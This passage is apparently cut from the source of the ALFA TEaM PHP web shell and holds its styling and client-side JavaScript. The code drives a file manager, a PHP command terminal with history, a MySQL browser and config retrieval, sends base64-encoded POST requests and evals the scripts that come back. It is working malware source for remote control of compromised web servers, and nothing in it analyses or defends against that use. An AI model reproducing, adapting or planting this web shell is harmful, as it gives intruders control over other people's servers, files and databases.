solid}.update-close:hover{border:2px #25ff00 solid;color:red}.filestools{height:auto;width:auto;color:#67abdf;font-size:12px;font-family:Verdana,Geneva,sans-serif}@-moz-document url-prefix(){#search-input{width:173px}.editor-path{top:3px}}.filters-holder{padding:5px;padding-left:10px}.filters-holder input{width:200px}.filters-holder span{color:#8bc7f7}#rightclick_menu{width:175px;visibility:hidden;opacity:0;position:fixed;background:#0f304a;color:#555;font-family:sans-serif;font-size:11px;-webkit-transition:opacity .5s ease-in-out;-moz-transition:opacity .5s ease-in-out;-ms-transition:opacity .5s ease-in-out;-o-transition:opacity .5s ease-in-out;transition:opacity .5s ease-in-out;-webkit-box-shadow:-1px 0 17px 0 #8b8b8c;-moz-box-shadow:-1px 0 17px 0 #8b8b8c;box-shadow:-1px 0 17px 0 #8b8b8c;padding:0;border:1px solid #737373;border-radius:10px}#rightclick_menu a{display:block;color:#fff;font-weight:bolder;text-decoration:none;padding:6px 8px 6px 30px;position:relative;padding-left:40px}#rightclick_menu a i.fa,#rightclick_menu a img{height:20px;font-size:17px;width:20px;position:absolute;left:5px;top:2px;padding-left:5px}#rightclick_menu a span{color:#bcb1b3;float:right}#rightclick_menu a:hover{color:#fff;background:#3879d9}#rightclick_menu hr{border:1px solid #ebebeb;border-bottom:0}.cl-popup-fixed{position:fixed;top:0;left:0;width:100%;height:100%;background:#201e1ead}#shortcutMenu-holder{position:absolute;top:40%;left:50%;transform:translate(-50%,-50%);background:#1f1e1edb;height:190px;width:500px;color:#fff}#shortcutMenu-holder>.popup-head{background:#207174;padding:6px;border-top:10px;text-align:center;font-family:sans-serif;color:#fff}#shortcutMenu-holder>form{padding:10px}#shortcutMenu-holder>form>label{display:block}#shortcutMenu-holder>form>input{width:99%;height:24px;margin-top:4px;color:#fff;outline:0;font-size:16px}#shortcutMenu-holder>.popup-foot{float:right;height:30px;margin-right:8px}#shortcutMenu-holder>.popup-foot>button{height:100%;cursor:pointer;color:#fff;outline:0}.php-terminal-output{overflow:auto;height:86%;border:1px solid #1e5673;border-radius:10px}.cmd-history-holder{visibility:hidden;opacity:0;position:absolute;color:#dff3d5;background:#093d58;top:-300px;height:300px;width:calc(69% + -11px);border-radius:10px 10px 0 0;left:calc(2% - 9px);transition:visibility .5s,opacity .5s linear}.cmd-history-holder .commands-history-header{background:#37504e;text-align:center;border-radius:10px 10px 0 0}.cmd-history-icon{width:27px;top:6px;left:calc(69% + 5px);position:absolute;cursor:pointer}.history-cmd-line{padding:4px;border-bottom:1px dashed;cursor:pointer}.history-cmd-line:hover{background:#961111}#myUL,#myUL ul{list-style-type:none}#myUL{margin:0;padding:0}.box{cursor:pointer;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.box::before{content:"\2610";color:#000;display:inline-block;margin-right:6px}.check-box::before{content:"\2611";color:#1e90ff}.nested{display:none}.active{display:block}.flag-holder>img{width:20px;vertical-align:middle;padding-left:6px}#options_window .content_options_holder .options_holder{position:relative;display:none;overflow:auto;min-height:300px;max-height:calc(100vh - 100px)}#options_window .content_options_holder .options_holder .header{min-height:50vh}#options_window .content_options_holder .options_holder.option_is_active{display:block}#options_window .content_options_holder .options_tab{padding:5px;margin-left:14px;margin-right:30px;background:#000;border-bottom:7px solid #0f304a;border-left:7px solid #0f304a;border-right:7px solid #0f304a;overflow-x:auto;white-space:nowrap}#filesman_tabs .filesman_tab img,#options_window .content_options_holder .options_tab .tab_name img,.editor-tab-name img,.sql-tabs .sql-tabname img,.terminal-tabs .terminal-tab img{width:10px;vertical-align:middle;margin-left:5px}#filesman_tabs .filesman_tab,#options_window .content_options_holder .options_tab .tab_name,.editor-tab-name,.sql-tabs .sql-newtab,.sql-tabs .sql-tabname,.terminal-tabs .terminal-tab{display:inline-block;background-color:#133d51;border-radius:4px;padding:5px;color:#fff;margin-right:3px;padding:5px;cursor:pointer;margin-bottom:1px;transition:background-color .5s}#filesman_tabs .filesman_tab{min-width:55px;text-align:center}#filesman_tabs .filesman_tab:hover,#options_window .content_options_holder .options_tab .tab_name:hover,.editor-tab-name:hover,.sql-tabs .sql-tabname:hover,.terminal-tabs .terminal-tab:hover{background-color:#a23939}.editor-tabs,.sql-tabs,.terminal-tabs{padding:5px;overflow-x:auto;white-space:nowrap}.options-loader-holder{position:absolute;top:0;left:0;width:100%;height:100%;background:#2b2626c7;z-index:11}.options-loader-holder img{position:absolute;top:32%;left:45%;transform:translate(-50%,-50%);width:100px;animation:spin 2s infinite}#filesman_tabs .filesman_tab.filesman-tab-active,#options_window .content_options_holder .options_tab .tab_name.tab_is_active,.editor-tab-name.editor-tab-active,.sql-tabname.sql-active-tab,.terminal-tab.active-terminal-tab{background-color:#009688}.tab-is-done{animation:2s tab_change_color infinite step-end}.stopAjax{color:#fff;font-size:20px;display:inline-block;padding:10px;cursor:pointer}#a_loader{display:none;position:fixed;top:0;left:0;width:100%;height:100%;background:#2b2626c7;z-index:99}.fmanager-row>td{position:relative}.fmanager-row .symlink_path{position:fixed;max-width:100%;background-color:#0f304a;border-radius:10px;font-size:15px;padding:8px;color:#fdf4f4;border:1px solid #8a8a8a;z-index:1;pointer-events:none}.archive-icons{vertical-align:middle}.archive-type-dir{font-weight:bolder}.archive-type-file{font-weight:unset}.archive-name{cursor:pointer}.archive_dir_holder a{color:#0f0;font-weight:bolder;cursor:pointer}.archive_dir_holder a:hover{color:#fff}.editor-content{height:100%}.editor-content-holder{height:90%}.editor-contents{display:none;position:relative;height:100%}.editor-contents.editor-content-active{display:block}.history-panel-controller{position:absolute;color:#fff;padding:10px;z-index:1000;border-radius:10px;top:50%;left:19%;background-color:#009687;cursor:pointer}.sql-content{display:none;position:relative;min-height:300px}.sql-content.sql-active-content{display:block}.pages-holder{padding:7px}.pages-number{display:inline-block;margin-left:10px}.pages-holder .pages-number a.page-number{padding:5px;background:#0f304a;margin-right:8px;cursor:pointer;width:33px;display:inline-block;text-align:center;border-radius:5px;color:#fff;transition:background .5s}.active-page-number{background:#10925c!important}.pages-number a.page-number:hover{background:#8a8a8a}.terminal-content{height:100%}.terminal-content,.terminal-tab{display:none}.terminal-content.active-terminal-content{display:block;position:relative}.terminal-btn-fontctl{background:#009688;width:50px;color:#fff;font-weight:bolder;outline:0;cursor:pointer}.alert-area{max-height:100%;position:fixed;bottom:5px;left:20px;right:20px;z-index:9999}.alert-box{font-size:16px;color:#fff;background:rgba(0,0,0,.9);line-height:1.3em;padding:10px 15px;margin:5px 10px;position:relative;border-radius:5px;transition:opacity .5s ease-in;-webkit-animation:alert-shake .5s ease-in-out;animation:alert-shake .5s ease-in-out}.alert-content-title{font-weight:700}.alert-box.alert-success{background:rgba(56,127,56,.89)}.alert-error{background:rgba(191,54,54,.89)}.alert-box.hide{opacity:0}.alert-close{background:0 0;width:12px;height:12px;position:absolute;top:15px;right:15px}.alert-close:after,.alert-close:before{content:"";width:15px;border-top:solid 2px #fff;position:absolute;top:5px;right:-1px;display:block}.alert-close:before{transform:rotate(45deg)}.alert-close:after{transform:rotate(135deg)}.alert-close:hover:after,.alert-close:hover:before{border-top:solid 2px #d8d8d8}@media (max-width:767px) and (min-width:481px){.alert-area{left:100px;right:100px}}@media (min-width:768px){.alert-area{width:350px;left:auto;right:0;z-index:9999}}@keyframes tab_change_color{0%{background-color:#133d51}50%{background-color:green}}@-webkit-keyframes alert-shake{0%{-webkit-transform:translateX(0)}20%{-webkit-transform:translateX(-10px)}40%{-webkit-transform:translateX(10px)}60%{-webkit-transform:translateX(-10px)}80%{-webkit-transform:translateX(10px)}100%{-webkit-transform:translateX(0)}}@keyframes alert-shake{0%{transform:translateX(0)}20%{transform:translateX(-10px)}40%{transform:translateX(10px)}60%{transform:translateX(-10px)}80%{transform:translateX(10px)}100%{transform:translateX(0)}}.textEffect{position:absolute;width:500px;top:-10px;animation:alert-shake .5s ease-in-out;animation-iteration-count:2}.alfateam-loader-text{position:absolute;color:#46bb45;top:23%;left:49%;transform:translate(-50%,-50%);font-size:40px;letter-spacing:7px}.alfa-ajax-error{position:absolute;color:#ff0a0a;top:50%;left:50%;transform:translate(-50%,-50%);font-size:30px}.connection-hist-table{margin-left:auto;margin-right:auto;text-align:justify;border-collapse:collapse}.connection-hist-table td,.connection-hist-table th{border:1px solid #ddd;text-align:left;padding:8px}.connection-his-btn{margin-bottom:10px;padding:5px;background:#206920;color:#fff;border:none;outline:0;cursor:pointer;font-weight:700;transition:background .3s}.connection-his-btn.connection-delete{margin:unset;padding:5px;background:red;width:33px;border-radius:3px;transition:background .3s}.connection-delete:hover{background:#f56969!important}.connection-his-btn:hover{background:#30b330}#up_bar_holder{position:fixed;z-index:100000;width:100%}#filesman_tabs{padding:8px;border:1px solid #0e304a;color:#67abdf;overflow-x:auto;white-space:nowrap}.sortable-ghost{opacity:.5;background:#c8ebfb}.folder-tab-icon{width:16px!important}#filesman-tab-full-path{display:none;position:absolute;pointer-events:none;background:#163746;padding:7px;color:#0f0;border-radius:10px;min-width:58px;z-index:10}#filesman-tab-full-path::after{content:"";position:absolute;top:100%;left:35px;margin-left:-5px;border-width:5px;border-style:solid;pointer-events:none;border-color:#163746 transparent transparent transparent}.mysql-main{height:84vh;position:relative}.mysql-hide-content{display:none}.mysql-query-result-tabs{margin-bottom:10px;padding:3px;border-bottom:4px solid #0f304a}.mysql-main .tables-panel-ctl{position:absolute;color:#fff;padding:10px;z-index:1;border-radius:10px;top:45%;left:calc(17% + 10px);background-color:#009687;cursor:pointer}.tables-panel-ctl-min{left:-21px!important}.mysql-query-result-tabs div{display:inline-block;padding:5px;margin-right:2px;background:#133d51;color:#fff;cursor:pointer;transition:background-color .5s}.mysql-query-result-tabs div:hover{background-color:#a23939}.mysql-query-result-tabs div.mysql-query-selected-tab{background:red}table tr.tbl_row:nth-child(odd){background:#424040}.mysql-tables .tables-row{margin-left:26px}.mysql-main .mysql-query-results,.mysql-main .mysql-tables{float:left;height:100%;overflow:auto}.mysql-main .mysql-query-results{width:calc(80% + 4px);margin-left:5px;position:relative;overflow:unset}.mysql-main .mysql-query-results-fixed{width:100%}.mysql-main .mysql-query-results .mysql-query-content{height:89%;overflow:auto}.mysql-query-tab-hide{height:0!important;padding:0!important}.mysql-main .mysql-tables{width:19%;border-right:4px solid #0e304a}.mysql-main table td{vertical-align:top}.mysql-main .mysql-search-area table td{vertical-align:middle;padding:7px}.mysql-tables .block{position:relative;width:1.5em;height:1.5em;min-width:16px;min-height:16px;float:left}.mysql-tables div.block b,.mysql-tables div.block i{width:1.5em;height:1.7em;min-width:16px;min-height:8px;position:absolute;bottom:.7em;left:.75em;z-index:0}.mysql-tables .block i{display:block;border-left:1px solid #666;border-bottom:1px solid #666;position:relative;z-index:0}.mysql-tables .block b{display:block;height:.75em;bottom:0;left:.75em;border-left:1px solid #666}.mysql-tables div.block a,.mysql-tables div.block u{position:absolute;left:50%;top:50%;z-index:10}.mysql-tables div.block img{position:relative;top:-.6em;left:0;margin-left:-7px}.mysql-tables .clearfloat{clear:both}.mysql-tables ul{list-style-type:none;margin-left:0;padding:0}.mysql-tables ul li{white-space:nowrap;clear:both;min-height:16px}.mysql-tables .db_name{margin-left:10px}.mysql-tables .list_container{border-left:1px solid #666;margin-left:.75em;padding-left:.75em}.hide-db-tables{display:none}.mysql-main:after{content:"";display:table;clear:both}table.mysql-data-tbl{border:none!important;border-collapse:collapse!important}table.mysql-data-tbl tr th{padding:5px}table.mysql-data-tbl td{border-left:3px solid #305a8d;border-right:3px solid #305a8d;padding:6px}table.mysql-data-tbl td:first-child{border-left:none}table.mysql-data-tbl td:last-child{border-right:none}.mysql-insert-result,.mysql-structure-qres,.mysql-update-result{display:none;text-align:center;padding:10px;border:1px dashed;margin:22px}#alfa-copyright{margin-top:15px}.ic_b_plus{background-image:url(http://solevisible.com/icons/menu/b_plus.png)}.ic_b_minus{background-image:url(http://solevisible.com/icons/menu/b_minus.png)} 
<?php  echo "
@keyframes spin {from {transform: rotate(0deg);}to{transform: rotate(360deg);}}\xa@-webkit-keyframes spin {from {-webkit-transform: rotate(0deg);}to {-webkit-transform: rotate(360deg);}}\xa@-moz-keyframes spin {from {-moz-transform: rotate(0deg);}to {-moz-transform: rotate(360deg);}}\xa@-ms-keyframes spin {from {-ms-transform: rotate(0deg);}to {-ms-transform: rotate(360deg);}}\xa#alfaloader{" . $csscode . "width:100px;height:100px;}\xa#a_loader img{" . $csscode . "width:150px;height:150px;position:fixed;z-index:999999;top: 31%;left: 45%;}\xa.ajaxarea{display:none;border:1px solid #0E304A;color:#67ABDF}.up_bar{margin-bottom: 2px;transition:width 2s;background-color:red;width:0;height:8px;display:none;}#hidden_sh{background-color:#0E304A;text-align:center;position:absolute;right:0;left:90%;border-bottom-left-radius:2em}.alert_green{color:#0F0;font-family:"Comic Sans MS";font-size:small;text-decoration:none}.whole{background-color:#000;background-image:url(http://solevisible.com/images/alfabg.png);background-position:center;background-attachment:fixed;background-repeat:no-repeat}.header{height:auto;width:auto;border:7px solid #0E304A;color:" . alfa_getColor("header_values") . ";font-size:12px;font-family:Verdana,Geneva,sans-serif}.header a{text-decoration:none;}.filestools a{color:#0F0;text-decoration:none}.filestools a:hover{color:#FFF;text-decoration:none;}span{font-weight:bolder;color:#FFF}.txtfont{font-family:"Comic Sans MS";font-size:small;color:#fff;display:inline-block}.txtfont_header{font-family:"Comic Sans MS";font-size:large;display:inline-block;color:#59cc33}.tbltxt{font-family:"Comic Sans MS";color:#fff;font-size:small;display:inline-block}input[type="file"]{display:none}.inputfile{border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;border-radius:4px;height:20px;width:250px;text-overflow:ellipsis;white-space:nowrap;cursor:pointer;display:inline-block;overflow:hidden}.inputfile:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}.inputfile span,.inputfile strong{padding:2px;padding-left:10px}.inputfile span{color:#25ff00;width:90px;min-height:2em;display:inline-block;text-overflow:ellipsis;white-space:nowrap;overflow:hidden;vertical-align:top;float:left}.inputfile strong{background-image:url(" . __showicon("alfamini") . ");background-repeat:no-repeat;background-position:float;height:100%;width:109px;color:#fff;background-color:#0E304A;display:inline-block;float:right}.inputfile:focus strong,.inputfile.has-focus strong,.inputfile:hover strong{background-color:#46647A}.button{padding:3px}#addup,.button{outline:none;cursor:pointer;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px;background-color:#000;color:green;border-radius:100px}#addup:hover,.button:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:disabled:hover{cursor:not-allowed}td{padding:" . ($GLOBALS["DB_NAME"]["show_icons"] == "1" ? "0" : "1") . "px}.myCheckbox{padding-left:2px}.myCheckbox label{display:inline-block;cursor:pointer;position:relative}.myCheckbox input[type=checkbox]{display:none}.myCheckbox label:before{content:"";display:inline-block;width:14px;height:13px;position:absolute;background-color:#aaa;box-shadow:inset 0 2px 3px 0 rgba(0,0,0,.3),0 1px 0 0 rgba(255,255,255,.8)}.myCheckbox label{margin-bottom:15px;padding-right:17px}.myCheckbox label:before{border-radius:100px}input[type=checkbox]:checked + label:before{content:"";background-color:#0E304A;background-image:url(" . __showicon("alfamini") . ");background-repeat:no-repeat;background-position:50% 50%;background-size:14px 14px;box-shadow:0 0 4px #0F0}#meunlist{font-family:Verdana,Geneva,sans-serif;color:#FFF;width:auto;border-right-width:7px;border-left-width:7px;height:auto;font-size:12px;font-weight:700;border-top-width:0;border-color:#0E304A;border-style:solid}.whole #meunlist ul{text-align:center;list-style-type:none;margin:0;padding:5px 5px 7px 2px}.whole #meunlist li{margin:0;padding:0;display:inline}.whole #meunlist a{font-family:arial,sans-serif;font-size:14px;text-decoration:none;font-weight:700;clear:both;width:100px;margin-right:-6px;border-right-width:1px;border-right-style:solid;border-right-color:#FFF;padding:3px 15px}.foot{font-family:Verdana,Geneva,sans-serif;margin:0;padding:0;width:100%;text-align:center;font-size:12px;color:#0E304A;border-right-width:7px;border-left-width:7px;border-bottom-width:7px;border-bottom-style:solid;border-right-style:solid;border-right-style:solid;border-left-style:solid;border-color:#0E304A}#text{text-align:center}input[type=submit]{cursor:pointer;background-image:url(" . __showicon("btn") . ");background-repeat:no-repeat;background-position:50% 50%;background-size:23px 23px;background-color:#000;width:30px;height:30px;border:1px solid #27979B;border-radius:100px}textarea{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}textarea:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text],input[type=number],.alfa_custom_cmd_btn{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}input[type=submit]:hover{color:#000;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:2px solid #27979B;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}select{padding:3px;width:162px;color:#FFE;text-shadow:#000 0 2px 7px;border:1px solid #0E304A;background:#000;text-decoration:none;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}select:hover{border:1px solid #27979B;box-shadow:0 0 4px #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}
.foottable{width: 300px;font-weight: bold;" . (!@is_writable($GLOBALS["cwd"]) ? "}.dir{background-color:red;}" : "}") . ".main th{text-align:left;}.main a{color: #FFF;}.main tr:hover{background-color:#646464 !important;}.ml1{ border:1px solid #0E304A;padding:5px;margin:0;overflow: auto; }.bigarea{ width:99%; height:300px; }.alfa_custom_cmd_btn {padding: 5px;color: #24ff03;cursor: pointer;}.ajaxarea.filesman-active-content {display: block;}" . alfaCssLoadColors() . "\xa</style>"; echo "<script type='text/javascript'>\xavar c_ = '" . htmlspecialchars($GLOBALS["cwd"]) . "';\xavar a_ = '" . htmlspecialchars(@$_POST["a"]) . "';\xavar charset_ = '" . htmlspecialchars(@$_POST["charset"]) . "';
var islinux = " . ($GLOBALS["sys"] != "win" ? "true" : "false") . ";\xavar post_encryption_mode = " . (__ALFA_POST_ENCRYPTION__ ? "true" : "false") . ";"; ?> 
var alfa1_="",alfa2_="",alfa3_="",alfa4_="",alfa5_="",alfa6_="",alfa7_="",alfa8_="",alfa9_="",alfa10_="",d=document,mysql_cache={},editor_files={},editor_error=!0,editor_current_file="",php_temrinal_using_cgi=!1,is_minimized=!1,cgi_is_minimized=!1,options_window_is_minimized=!1,database_window_is_minimized=!1,rightclick_menu_context=null,can_hashchange_work=!0,alfa_can_add_opt=!1,alfa_before_do_action_id="",alfa_ace_editors={editor:null,eval:null},col_dumper_selected_data={},_ALFA_AJAX_={},cgi_lang="",upcount=1,terminal_walk_index=[],alfa_current_fm_id=1,alfa_fm_id=0;function set(e,a,t,i,l,o,r,n,s,c,f,_,u){d.mf.a.value=null!=e?e:a_,d.mf.c.value=null!=a?a:c_,d.mf.alfa1.value=null!=t?t:"",d.mf.alfa2.value=null!=i?i:"",d.mf.alfa3.value=null!=l?l:"",d.mf.alfa4.value=null!=o?o:"",d.mf.alfa5.value=null!=r?r:"",d.mf.alfa6.value=null!=n?n:"",d.mf.alfa7.value=null!=s?s:"",d.mf.alfa8.value=null!=c?c:"",d.mf.alfa9.value=null!=f?f:"",d.mf.alfa10.value=null!=_?_:"",d.mf.charset.value=null!=u?u:charset_}function fc(e){var a=alfa_current_fm_id,t="a="+alfab64("FilesMan")+"&c="+alfab64(e.c.value)+"&alfa1="+alfab64(e.alfa1.value)+"&ajax="+alfab64("true")+"&",i="",l=0;if(d.querySelectorAll("#filesman_holder_"+a+" form[name=files] input[type=checkbox]").forEach(function(e){e.checked&&(l++,i+="f[]="+alfab64(decodeURIComponent(e.value))+"&")}),0==l&&"paste"!=e.alfa1.value)return!1;switch(alfaloader("filesman_holder_"+a,"block"),e.alfa1.value){case"delete":d.querySelectorAll("#filesman_holder_"+a+" .fmanager-row").forEach(function(e){var a=e.querySelector("input[type=checkbox]");a.checked&&".."!=a.value?e.remove():a.checked=!1}),d.querySelector("#filesman_holder_"+a+" .chkbx").checked=!1;break;case"copy":case"move":case"zip":case"unzip":d.querySelectorAll("#filesman_holder_"+a+" input[type=checkbox]:checked").forEach(function(e){e.checked=!1})}_Ajax(d.URL,t+i,function(e){alfaloader("filesman_holder_"+a,"none"),alfaFmngrContextRow()},!1,"filesman_holder_"+a)}function initDir(e){var a="",t="";islinux&&(a="<a class=\"header_pwd\" onclick=\"g('FilesMan','/');\" path='/' href='#action=fileman&path=/'>/</a>",t="/");var l=e.split("/"),o="",r=islinux?"/":"";for(i in"-1"!=l.indexOf("..")&&(l.splice(l.indexOf("..")-1,1),l.splice(l.indexOf(".."),1)),l)""!=l[i]&&(o+="<a onclick=\"g('FilesMan','"+r+l[i]+"/');\" path='"+r+l[i]+"/' href='#action=fileman&path="+r+l[i]+'/\' class="header_pwd">'+l[i]+"/</a>",r+=l[i]+"/");$("header_cwd").innerHTML=a+o+" ",alfaInitCwdContext(),l=(l=t+l.join("/")).replace("//","/"),d.footer_form.c.value=l,$("footer_cwd").value=l,c_=l}function evalJS(html){var newElement=document.createElement("div");newElement.innerHTML=html;for(var scripts=newElement.getElementsByTagName("script"),i=0;i<scripts.length;++i){var script=scripts[i];eval(script.innerHTML)}}function _Ajax(e,a,t,i,l){var o=!1;return window.XMLHttpRequest?o=new XMLHttpRequest:window.ActiveXObject&&(o=new ActiveXObject("Microsoft.XMLHTTP")),void 0!==l&&(_ALFA_AJAX_[l]=o),o?(o.onreadystatechange=function(){4==o.readyState&&200==o.status?"function"==typeof t&&(t(o.responseText,l),alfaClearAjax(l)):4==o.readyState&&200!=o.status&&(alfaAjaxError(o.status,l,o.statusText,o.responseText),alfaClearAjax(l))},o.open("POST",e,!0),o.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),void o.send(a)):void alert("Error !")}function alfaClearAjax(e){_ALFA_AJAX_.hasOwnProperty(e)&&delete _ALFA_AJAX_[e]}function handleup(e,a){var t="__fnameup";if(0!=a&&(t="__fnameup"+a),e.files.length>1){for(var i="",l=0;l<e.files.length;l++)i+=e.files[0].name+", ";$(t).innerHTML=i}else e.files[0].name&&($(t).innerHTML=e.files[0].name)}function u(e){var a=!1,t=0,i=alfa_current_fm_id,l=new FormData,o="filesman_holder_"+i;l.append("a",alfab64(e.a.value)),l.append("c",alfab64(e.c.value)),l.append("alfa1",alfab64(e.alfa1.value)),l.append("charset",alfab64(e.charset.value)),l.append("ajax",alfab64(e.ajax.value)),e.querySelectorAll("input[type=file]").forEach(function(e){if(0==e.value.length)return!1;if(e.files.length>1)for(var a=0;a<e.files.length;a++)l.append("f[]",e.files[a]);else l.append("f[]",e.files[0]);t++}),$("footerup").value="",$("__fnameup").innerHTML="";for(var r=1;r<=upcount;r++){var n=$("pfooterup_"+r);n&&n.parentNode.removeChild(n),upcount--}if(0==upcount&&upcount++,0==t)return!1;var s="up_bar_"+getRandom();$("up_bar_holder").insertAdjacentHTML("beforeend","<div id='"+s+"' class='up_bar'></div>");e.c.value;if(window.XMLHttpRequest?a=new XMLHttpRequest:window.ActiveXObject&&(a=new ActiveXObject("Microsoft.XMLHTTP")),a){var c=$(s);_ALFA_AJAX_[s]=a,a.upload&&(c.style.display="block",a.upload.onprogress=function(e){var a=e.position||e.loaded,t=e.totalSize||e.total,i=Math.floor(a/t*1e3)/10+"%";c.style.width=i}),a.onload=function(e){200===a.status?c.style.display="none":alfaAjaxError(a.status,"upload_area",a.statusText,a.responseText),alfaClearAjax(s)},a.onreadystatechange=function(){if(4==a.readyState&&200==a.status){if("noperm"!=a.responseText&&"[]"!=a.responseText){var e,t=JSON.parse(a.responseText),l="",r=d.querySelectorAll("#"+o+" #filemanager_table tr").length-3;for(e in t){++r;var n=t[e].name,s=encodeURIComponent(n),c=t[e].size,f=t[e].perm,_=t[e].modify,u=t[e].owner,p=loadType(n,"file");try{d.querySelector("#"+o+" .fmanager-row a[fname='"+n+"']").parentElement.parentElement.parentElement.remove()}catch(e){}l+='<tr class="fmanager-row" id="tr_row_'+r+'"><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="'+n+'" class="chkbx" id="checkbox'+r+'"><label for="checkbox'+r+'"></label></div></td><td id="td_row_'+r+'">'+p+'<div style="position:relative;display:inline-block;bottom:12px;"><a row="'+r+'" id="id_'+r+'" class="main_name" onclick="editor(\''+s+"','auto','','','','file');\" href=\"#action=fileman&amp;path="+c_+"&amp;file="+s+'" fname="'+n+'" ftype="file" path="'+c_+'" opt_title="">'+n+'</a></div></td><td><span style="font-weight:unset;" class="main_size">'+c+'</span></td><td><span style="font-weight:unset;" class="main_modify">'+_+'</span></td><td><span style="font-weight:unset;" class="main_owner_group">'+u+'</span></td><td><a id="id_chmode_'+r+'" href="javascript:void(0)" onclick="editor(\''+s+"','chmod','','','','file')\">"+f+'</a></td><td><a id="id_rename_'+r+'" title="Rename" class="actions" href="javascript:void(0);" onclick="editor(\''+s+"', 'rename','','','','file')\">R</a> <a id=\"id_touch_"+r+'" title="Modify Datetime" class="actions" href="javascript:void(0);" onclick="editor(\''+s+"', 'touch','','','','file')\">T</a> <a id=\"id_edit_"+r+'" class="actions" title="Edit" href="javascript:void(0);" onclick="editor(\''+s+"', 'edit','','','','file')\">E</a> <a id=\"id_download_"+r+'" title="Download" class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''+n+"', 'download')\">D</a><a id=\"id_delete_"+r+'" title="Delete" class="actions" href="javascript:void(0);" onclick="var chk = confirm(\'Are You Sure For Delete # '+s+" # ?'); chk ? g('FilesMan',null,'delete', '"+s+"') : '';\"> X </a></td></tr>"}d.querySelector("#"+o+" #filemanager_last_tr").insertAdjacentHTML("beforebegin",l),alfaShowNotification("File(s) uploaded successfully","Uploader"),alfaFmngrContextRow()}else alfaShowNotification("Folder has no permission...","Uploader","error");alfaCheckCurrentFilesManTab(i)}},a.open("POST",d.URL),a.send(l)}}function alfaCheckCurrentFilesManTab(e){-1==$("filesman_tab_"+e).classList.value.indexOf("filesman-tab-active")&&$("filesman_tab_"+e).classList.add("tab-is-done")}function g(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset){var fm_id=0==alfa_fm_id?alfa_current_fm_id:alfa_fm_id,fm_id2=alfa_fm_id,fm_path=null==c||0==c.length?c_:c,d_mf_c=fm_path,g_action_id=alfa_before_do_action_id;0==alfa_fm_id&&(set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset),d_mf_c=d.mf.c.value),"GetConfig"!=a&&"download"!=alfa2&&islinux&&"/"!=d_mf_c.substr(0,1)&&(d_mf_c="/"+d_mf_c),"FilesMan"==a?(alfaloader("filesman_holder_"+fm_id,"block"),g_action_id="filesman_holder_"+fm_id):""!=g_action_id?alfaloader(g_action_id,"block"):"FilesTools"!=a&&"download"!=alfa2&&"GetConfig"!=a&&("sql"==a?(showEditor("database_window"),g_action_id=loadPopUpDatabase("")):"FilesMan"!=a&&(showEditor("options_window"),g_action_id=loadPopUpOpTions(a)),alfaloader(g_action_id,"block"));for(var data="a="+alfab64(a)+"&c="+alfab64(d_mf_c)+"&",i=1;i<=10;i++)data+="alfa"+i+"="+alfab64(eval("d.mf.alfa"+i+".value"))+"&";if("FilesMan"==a){var pagenum=d.querySelector("#"+g_action_id+" .page-number.active-page-number");null!=pagenum&&(data+="pagenum="+alfab64(getCookie(g_action_id+"_page_number")),setCookie(g_action_id+"_page_number",1,2012))}if(data+="&ajax="+alfab64("true"),"FilesTools"==a&&"download"==alfa2){alfaLoaderOnTop("none");var dl=$("dlForm");return dl.a.value=alfab64("dlfile"),dl.c.value=alfab64(d_mf_c),dl.file.value=alfab64(alfa1),void dl.submit()}"GetConfig"!=a?(_Ajax(d.URL,data,function(e,t){evalJS(e);var i=!1;if(alfaLoaderOnTop("none"),"sql"==a)return 